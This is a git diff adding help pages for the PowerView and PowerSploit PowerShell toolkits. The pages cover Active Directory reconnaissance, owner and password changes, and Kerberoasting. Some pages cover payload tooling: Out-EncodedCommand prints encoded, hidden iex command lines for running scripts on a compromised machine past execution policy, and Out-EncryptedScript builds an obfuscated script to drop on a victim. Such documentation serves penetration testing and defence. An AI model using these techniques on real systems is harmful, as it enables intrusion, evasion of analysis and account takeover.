+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Set-DomainObjectOwner.md b/docs/Recon/Set-DomainObjectOwner.md new file mode 100755 index 0000000..0da8819 --- /dev/null +++ b/docs/Recon/Set-DomainObjectOwner.md @@ -0,0 +1,234 @@ +# Set-DomainObjectOwner
+
+## SYNOPSIS
+Modifies the owner for a specified active directory object.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainObject
+
+## SYNTAX
+
+```
+Set-DomainObjectOwner [-Identity] <String> -OwnerIdentity <String> [-Domain <String>] [-LDAPFilter <String>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Retrieves the Active Directory object specified by -Identity by splatting to
+Get-DomainObject, returning the raw searchresult object.
+Retrieves the raw
+directoryentry for the object, and sets the object owner to -OwnerIdentity.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y
+```
+
+Set the owner of 'dfm' in the current domain to 'harmj0y'.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Set-DomainObjectOwner -Identity dfm -OwnerIdentity harmj0y -Credential $Cred
+
+Set the owner of 'dfm' in the current domain to 'harmj0y' using the alternate credentials.
+
+## PARAMETERS
+
+### -Identity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+of the AD object to set the owner for.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -OwnerIdentity
+A SamAccountName (e.g.
+harmj0y), DistinguishedName (e.g.
+CN=harmj0y,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+of the owner to set for -Identity.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Owner
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Set-DomainUserPassword.md b/docs/Recon/Set-DomainUserPassword.md new file mode 100755 index 0000000..2dd111a --- /dev/null +++ b/docs/Recon/Set-DomainUserPassword.md @@ -0,0 +1,127 @@ +# Set-DomainUserPassword
+
+## SYNOPSIS
+Sets the password for a given user identity.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-PrincipalContext
+
+## SYNTAX
+
+```
+Set-DomainUserPassword [-Identity] <String> -AccountPassword <SecureString> [-Domain <String>]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+First binds to the specified domain context using Get-PrincipalContext.
+The bound domain context is then used to search for the specified user -Identity,
+which returns a DirectoryServices.AccountManagement.UserPrincipal object.
+The
+SetPassword() function is then invoked on the user, setting the password to -AccountPassword.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword
+
+Resets the password for 'andy' to the password specified.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred
+
+Resets the password for 'andy' usering the alternate credentials specified.
+
+## PARAMETERS
+
+### -Identity
+A user SamAccountName (e.g.
+User1), DistinguishedName (e.g.
+CN=user1,CN=Users,DC=testlab,DC=local),
+SID (e.g.
+S-1-5-21-890171859-3433809279-3366196753-1113), or GUID (e.g.
+4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)
+specifying the user to reset the password for.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: UserName, UserIdentity, User
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -AccountPassword
+Specifies the password to reset the target user's to.
+Mandatory.
+
+```yaml
+Type: SecureString
+Parameter Sets: (All)
+Aliases: Password
+
+Required: True
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use to search for the user identity, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### DirectoryServices.AccountManagement.UserPrincipal
+
+## NOTES
+
+## RELATED LINKS
+
+[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)
+
diff --git a/docs/Recon/Test-AdminAccess.md b/docs/Recon/Test-AdminAccess.md new file mode 100755 index 0000000..84eab4e --- /dev/null +++ b/docs/Recon/Test-AdminAccess.md @@ -0,0 +1,101 @@ +# Test-AdminAccess
+
+## SYNOPSIS
+Tests if the current user has administrative access to the local (or a remote) machine.
+
+Idea stolen from the local_admin_search_enum post module in Metasploit written by:
+ 'Brandon McCann "zeknox" \<bmccann\[at\]accuvant.com\>'
+ 'Thomas McCarthy "smilingraccoon" \<smilingraccoon\[at\]gmail.com\>'
+ 'Royce Davis "r3dy" \<rdavis\[at\]accuvant.com\>'
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Test-AdminAccess [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will use the OpenSCManagerW Win32API call to establish
+a handle to the remote host.
+If this succeeds, the current user context
+has local administrator acess to the target.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Test-AdminAccess -ComputerName sqlserver
+```
+
+Returns results indicating whether the current user has admin access to the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer | Test-AdminAccess
+```
+
+Returns what machines in the domain the current user has access to.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Test-AdminAccess -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to check for local admin access (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.AdminAccess
+
+A PSCustomObject containing the ComputerName and 'IsAdmin' set to whether
+the current user has local admin rights, along with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/local_admin_search_enum.rb
+http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
diff --git a/docs/Recon/index.md b/docs/Recon/index.md new file mode 100755 index 0000000..b3eca5c --- /dev/null +++ b/docs/Recon/index.md @@ -0,0 +1,111 @@ +## PowerView
+
+PowerView is a PowerShell tool to gain network situational awareness on
+Windows domains. It contains a set of pure-PowerShell replacements for various
+windows "net *" commands, which utilize PowerShell AD hooks and underlying
+Win32 API functions to perform useful Windows domain functionality.
+
+It also implements various useful metafunctions, including some custom-written
+user-hunting functions which will identify where on the network specific users
+are logged into. It can also check which machines on the domain the current
+user has local administrator access on. Several functions for the enumeration
+and abuse of domain trusts also exist. See function descriptions for appropriate
+usage and available options. For detailed output of underlying functionality, pass
+the -Verbose or -Debug flags.
+
+For functions that enumerate multiple machines, pass the -Verbose flag to get a
+progress status as each host is enumerated. Most of the "meta" functions accept
+an array of hosts from the pipeline.
+
+
+### Misc Functions:
+ Export-PowerViewCSV - thread-safe CSV append
+ Resolve-IPAddress - resolves a hostname to an IP
+ ConvertTo-SID - converts a given user/group name to a security identifier (SID)
+ Convert-ADName - converts object names between a variety of formats
+ ConvertFrom-UACValue - converts a UAC int value to human readable form
+ Add-RemoteConnection - pseudo "mounts" a connection to a remote path using the specified credential object
+ Remove-RemoteConnection - destroys a connection created by New-RemoteConnection
+ Invoke-UserImpersonation - creates a new "runas /netonly" type logon and impersonates the token
+ Invoke-RevertToSelf - reverts any token impersonation
+ Get-DomainSPNTicket - request the kerberos ticket for a specified service principal name (SPN)
+ Invoke-Kerberoast - requests service tickets for kerberoast-able accounts and returns extracted ticket hashes
+ Get-PathAcl - get the ACLs for a local/remote file path with optional group recursion
+
+
+### Domain/LDAP Functions:
+ Get-DomainDNSZone - enumerates the Active Directory DNS zones for a given domain
+ Get-DomainDNSRecord - enumerates the Active Directory DNS records for a given zone
+ Get-Domain - returns the domain object for the current (or specified) domain
+ Get-DomainController - return the domain controllers for the current (or specified) domain
+ Get-Forest - returns the forest object for the current (or specified) forest
+ Get-ForestDomain - return all domains for the current (or specified) forest
+ Get-ForestGlobalCatalog - return all global catalogs for the current (or specified) forest
+ Find-DomainObjectPropertyOutlier- inds user/group/computer objects in AD that have 'outlier' properties set
+ Get-DomainUser - return all users or specific user objects in AD
+ New-DomainUser - creates a new domain user (assuming appropriate permissions) and returns the user object
+ Get-DomainUserEvent - enumerates account logon events (ID 4624) and Logon with explicit credential events
+ Get-DomainComputer - returns all computers or specific computer objects in AD
+ Get-DomainObject - returns all (or specified) domain objects in AD
+ Set-DomainObject - modifies a gven property for a specified active directory object
+ Get-DomainObjectAcl - returns the ACLs associated with a specific active directory object
+ Add-DomainObjectAcl - adds an ACL for a specific active directory object
+ Find-InterestingDomainAcl - finds object ACLs in the current (or specified) domain with modification rights set to non-built in objects
+ Get-DomainOU - search for all organization units (OUs) or specific OU objects in AD
+ Get-DomainSite - search for all sites or specific site objects in AD
+ Get-DomainSubnet - search for all subnets or specific subnets objects in AD
+ Get-DomainSID - returns the SID for the current domain or the specified domain
+ Get-DomainGroup - return all groups or specific group objects in AD
+ New-DomainGroup - creates a new domain group (assuming appropriate permissions) and returns the group object
+ Get-DomainManagedSecurityGroup - returns all security groups in the current (or target) domain that have a manager set
+ Get-DomainGroupMember - return the members of a specific domain group
+ Add-DomainGroupMember - adds a domain user (or group) to an existing domain group, assuming appropriate permissions to do so
+ Get-DomainFileServer - returns a list of servers likely functioning as file servers
+ Get-DomainDFSShare - returns a list of all fault-tolerant distributed file systems for the current (or specified) domain
+
+
+### GPO functions
+
+ Get-DomainGPO - returns all GPOs or specific GPO objects in AD
+ Get-DomainGPOLocalGroup - returns all GPOs in a domain that modify local group memberships through 'Restricted Groups' or Group Policy preferences
+ Get-DomainGPOUserLocalGroupMapping - enumerates the machines where a specific domain user/group is a member of a specific local group, all through GPO correlation
+ Get-DomainGPOComputerLocalGroupMapping - takes a computer (or GPO) object and determines what users/groups are in the specified local group for the machine through GPO correlation
+ Get-DomainPolicy - returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller
+
+
+### Computer Enumeration Functions
+
+ Get-NetLocalGroup - enumerates the local groups on the local (or remote) machine
+ Get-NetLocalGroupMember - enumerates members of a specific local group on the local (or remote) machine
+ Get-NetShare - returns open shares on the local (or a remote) machine
+ Get-NetLoggedon - returns users logged on the local (or a remote) machine
+ Get-NetSession - returns session information for the local (or a remote) machine
+ Get-RegLoggedOn - returns who is logged onto the local (or a remote) machine through enumeration of remote registry keys
+ Get-NetRDPSession - returns remote desktop/session information for the local (or a remote) machine
+ Test-AdminAccess - rests if the current user has administrative access to the local (or a remote) machine
+ Get-NetComputerSiteName - returns the AD site where the local (or a remote) machine resides
+ Get-WMIRegProxy - enumerates the proxy server and WPAD conents for the current user
+ Get-WMIRegLastLoggedOn - returns the last user who logged onto the local (or a remote) machine
+ Get-WMIRegCachedRDPConnection - returns information about RDP connections outgoing from the local (or remote) machine
+ Get-WMIRegMountedDrive - returns information about saved network mounted drives for the local (or remote) machine
+ Get-WMIProcess - returns a list of processes and their owners on the local or remote machine
+ Find-InterestingFile - searches for files on the given path that match a series of specified criteria
+
+
+### Threaded 'Meta'-Functions
+
+ Find-DomainUserLocation - finds domain machines where specific users are logged into
+ Find-DomainProcess - finds domain machines where specific processes are currently running
+ Find-DomainUserEvent - finds logon events on the current (or remote domain) for the specified users
+ Find-DomainShare - finds reachable shares on domain machines
+ Find-InterestingDomainShareFile - searches for files matching specific criteria on readable shares in the domain
+ Find-LocalAdminAccess - finds machines on the local domain where the current user has local administrator access
+ Find-DomainLocalGroupMember - enumerates the members of specified local group on machines in the domain
+
+
+### Domain Trust Functions:
+ Get-DomainTrust - returns all domain trusts for the current domain or a specified domain
+ Get-ForestTrust - returns all forest trusts for the current forest or a specified forest
+ Get-DomainForeignUser - enumerates users who are in groups outside of the user's domain
+ Get-DomainForeignGroupMember - enumerates groups with users outside of the group's domain and returns each foreign member
+ Get-DomainTrustMapping - this function enumerates all trusts for the current domain and then enumerates all trusts for each domain it finds
diff --git a/docs/ScriptModification/Out-CompressedDll.md b/docs/ScriptModification/Out-CompressedDll.md new file mode 100755 index 0000000..df7cff5 --- /dev/null +++ b/docs/ScriptModification/Out-CompressedDll.md @@ -0,0 +1,60 @@ +# Out-CompressedDll
+
+## SYNOPSIS
+Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory.
+
+PowerSploit Function: Out-CompressedDll
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Out-CompressedDll [-FilePath] <String>
+```
+
+## DESCRIPTION
+Out-CompressedDll outputs code that loads a compressed representation of a managed dll in memory as a byte array.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Out-CompressedDll -FilePath evil.dll
+```
+
+Description
+-----------
+Compresses, base64 encodes, and outputs the code required to load evil.dll in memory.
+
+## PARAMETERS
+
+### -FilePath
+Specifies the path to a managed executable.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+Only pure MSIL-based dlls can be loaded using this technique.
+Native or IJW ('it just works' - mixed-mode) dlls will not load.
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html](http://www.exploit-monday.com/2012/12/in-memory-dll-loading.html)
+
diff --git a/docs/ScriptModification/Out-EncodedCommand.md b/docs/ScriptModification/Out-EncodedCommand.md new file mode 100755 index 0000000..6666796 --- /dev/null +++ b/docs/ScriptModification/Out-EncodedCommand.md @@ -0,0 +1,186 @@ +# Out-EncodedCommand
+
+## SYNOPSIS
+Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script.
+
+PowerSploit Function: Out-EncodedCommand
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### FilePath (Default)
+```
+Out-EncodedCommand [[-Path] <String>] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64] [-WindowStyle <String>]
+ [-EncodedOutput]
+```
+
+### ScriptBlock
+```
+Out-EncodedCommand [[-ScriptBlock] <ScriptBlock>] [-NoExit] [-NoProfile] [-NonInteractive] [-Wow64]
+ [-WindowStyle <String>] [-EncodedOutput]
+```
+
+## DESCRIPTION
+Out-EncodedCommand prepares a PowerShell script such that it can be pasted into a command prompt.
+The scenario for using this tool is the following: You compromise a machine, have a shell and want to execute a PowerShell script as a payload.
+This technique eliminates the need for an interactive PowerShell 'shell' and it bypasses any PowerShell execution policies.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Out-EncodedCommand -ScriptBlock {Write-Host 'hello, world!'}
+```
+
+powershell -C sal a New-Object;iex(a IO.StreamReader((a IO.Compression.DeflateStream(\[IO.MemoryStream\]\[Convert\]::FromBase64String('Cy/KLEnV9cgvLlFQz0jNycnXUSjPL8pJUVQHAA=='),\[IO.Compression.CompressionMode\]::Decompress)),\[Text.Encoding\]::ASCII)).ReadToEnd()
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Out-EncodedCommand -Path C:\EvilPayload.ps1 -NonInteractive -NoProfile -WindowStyle Hidden -EncodedOutput
+```
+
+powershell -NoP -NonI -W Hidden -E cwBhAGwAIABhACAATgBlAHcALQBPAGIAagBlAGMAdAA7AGkAZQB4ACgAYQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAKABhACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoAFsASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AXQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcATABjAGkAeABDAHMASQB3AEUAQQBEAFEAWAAzAEUASQBWAEkAYwBtAEwAaQA1AEsAawBGAEsARQA2AGwAQgBCAFIAWABDADgAaABLAE8ATgBwAEwAawBRAEwANAAzACsAdgBRAGgAdQBqAHkAZABBADkAMQBqAHEAcwAzAG0AaQA1AFUAWABkADAAdgBUAG4ATQBUAEMAbQBnAEgAeAA0AFIAMAA4AEoAawAyAHgAaQA5AE0ANABDAE8AdwBvADcAQQBmAEwAdQBYAHMANQA0ADEATwBLAFcATQB2ADYAaQBoADkAawBOAHcATABpAHMAUgB1AGEANABWAGEAcQBVAEkAagArAFUATwBSAHUAVQBsAGkAWgBWAGcATwAyADQAbgB6AFYAMQB3ACsAWgA2AGUAbAB5ADYAWgBsADIAdAB2AGcAPQA9ACcAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkALABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA=
+
+Description
+-----------
+Execute the above payload for the lulz.
+\>D
+
+## PARAMETERS
+
+### -ScriptBlock
+Specifies a scriptblock containing your payload.
+
+```yaml
+Type: ScriptBlock
+Parameter Sets: ScriptBlock
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the path to your payload.
+
+```yaml
+Type: String
+Parameter Sets: FilePath
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -NoExit
+Outputs the option to not exit after running startup commands.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -NoProfile
+Outputs the option to not load the Windows PowerShell profile.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -NonInteractive
+Outputs the option to not present an interactive prompt to the user.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Wow64
+Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -WindowStyle
+Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -EncodedOutput
+Base-64 encodes the entirety of the output.
+This is usually unnecessary and effectively doubles the size of the output.
+This option is only for those who are extra paranoid.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+This cmdlet was inspired by the createcmd.ps1 script introduced during Dave Kennedy and Josh Kelley's talk, "PowerShell...OMFG" (https://www.trustedsec.com/files/PowerShell_PoC.zip)
+
+## RELATED LINKS
+
+[http://www.exploit-monday.com](http://www.exploit-monday.com)
+
diff --git a/docs/ScriptModification/Out-EncryptedScript.md b/docs/ScriptModification/Out-EncryptedScript.md new file mode 100755 index 0000000..36db457 --- /dev/null +++ b/docs/ScriptModification/Out-EncryptedScript.md @@ -0,0 +1,148 @@ +# Out-EncryptedScript
+
+## SYNOPSIS
+Encrypts text files/scripts.
+
+PowerSploit Function: Out-EncryptedScript
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Out-EncryptedScript [-ScriptPath] <String> [-Password] <SecureString> [-Salt] <String>
+ [[-InitializationVector] <String>] [[-FilePath] <String>]
+```
+
+## DESCRIPTION
+Out-EncryptedScript will encrypt a script (or any text file for that
+matter) and output the results to a minimally obfuscated script -
+evil.ps1 by default.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+$Password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+Out-EncryptedScript .\Naughty-Script.ps1 $Password salty
+
+Description
+-----------
+Encrypt the contents of this file with a password and salt.
+This will
+make analysis of the script impossible without the correct password
+and salt combination.
+This command will generate evil.ps1 that can
+dropped onto the victim machine.
+It only consists of a decryption
+function 'de' and the base64-encoded ciphertext.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+[String] $cmd = Get-Content .\evil.ps1
+```
+
+Invoke-Expression $cmd
+$decrypted = de password salt
+Invoke-Expression $decrypted
+
+Description
+-----------
+This series of instructions assumes you've already encrypted a script
+and named it evil.ps1.
+The contents are then decrypted and the
+unencrypted script is called via Invoke-Expression
+
+## PARAMETERS
+
+### -ScriptPath
+Path to this script
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Password
+Password to encrypt/decrypt the script
+
+```yaml
+Type: SecureString
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Salt
+Salt value for encryption/decryption.
+This can be any string value.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -InitializationVector
+Specifies a 16-character the initialization vector to be used.
+This
+is randomly generated by default.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 4
+Default value: ((1..16 | ForEach-Object {[Char](Get-Random -Min 0x41 -Max 0x5B)}) -join '')
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FilePath
+{{Fill FilePath Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: .\evil.ps1
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+This command can be used to encrypt any text-based file/script
+
+## RELATED LINKS
+
diff --git a/docs/ScriptModification/Remove-Comment.md b/docs/ScriptModification/Remove-Comment.md new file mode 100755 index 0000000..97335ae --- /dev/null +++ b/docs/ScriptModification/Remove-Comment.md @@ -0,0 +1,110 @@ +# Remove-Comment
+
+## SYNOPSIS
+Strips comments and extra whitespace from a script.
+
+PowerSploit Function: Remove-Comment
+Author: Matthew Graeber (@mattifestation)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+### FilePath (Default)
+```
+Remove-Comment [-Path] <String>
+```
+
+### ScriptBlock
+```
+Remove-Comment [-ScriptBlock] <ScriptBlock>
+```
+
+## DESCRIPTION
+Remove-Comment strips out comments and unnecessary whitespace from a script.
+This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big.
+
+A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script.
+You rock, Lee!
+
